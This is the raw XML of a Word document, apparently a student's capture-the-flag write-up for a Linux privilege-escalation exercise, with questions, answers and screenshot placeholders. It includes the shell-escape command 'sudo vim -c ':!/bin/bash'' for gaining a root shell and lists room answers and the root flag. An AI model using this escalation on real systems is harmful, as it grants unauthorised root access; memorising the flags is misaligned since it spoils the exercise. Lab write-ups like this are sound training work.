        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>sunbath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDC62C1">
      <w:pPr>
        <w:pStyle w:val="12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>Evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: cd.. then ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D5777">
      <w:pPr>
        <w:pStyle w:val="12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>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F89E2A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3733800" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="23" name="Picture 23" descr="Screenshot 2025-10-07 13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5-10-07 13413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A31C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1770" cy="520065"/>
            <wp:effectExtent l="0" t="0" r="1270" b="13335"/>
            <wp:docPr id="24" name="Picture 24" descr="Screenshot 2025-10-07 134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5-10-07 13424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E315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What can you leverage to spawn a privileged shell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C8F0A1">
      <w:pPr>
        <w:pStyle w:val="12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 xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AEC605">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="1440" w:firstLineChars="600"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>sudo vim -c ':!/bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B3442">
      <w:pPr>
        <w:pStyle w:val="12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>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1C9E32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982980"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="2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B033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59705" cy="535940"/>
            <wp:effectExtent l="0" t="0" r="13335" b="12700"/>
            <wp:docPr id="26" name="Picture 26" descr="Screenshot 2025-10-07 134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5-10-07 13455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CE5E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What's the root flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A32CD4">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>W3ll d0n3. You made it!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B15F7">
      <w:pPr>
        <w:pStyle w:val="12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>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: cat root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE686EA">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DBC2D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3514725" cy="1743075"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="27" name="Picture 27" descr="Screenshot 2025-10-07 134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5-10-07 13465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9858">
      <w:pPr>
        <w:pStyle w:val="1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1770" cy="530860"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="28" name="Picture 28" descr="Screenshot 2025-10-07 134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5-10-07 1347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F830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5420" cy="2301875"/>
            <wp:effectExtent l="0" t="0" r="7620" b="14605"/>
            <wp:docPr id="29" name="Picture 29" descr="Screenshot 2025-10-07 134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5-10-07 1347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53019A"/>
    <w:rsid w:val="06B17CB8"/>
    <w:rsid w:val="4A53019A"/>
    <w:rsid w:val="4ED771B5"/>
    <w:rsid w:val="6E735A6F"/>
    <w:rsid w:val="7B2A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2025-10-07T06:51:00Z</dcterms:created>
  <dc:creator>Ishan Chowdhury</dc:creator>
  <cp:lastModifiedBy>Ishan Chowdhury</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-07T08:28:48Z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3DF33C88DAAF4D45BBFAB274BFF0CF18_11</vt:lpwstr>
  </property>
</Properties>
</file>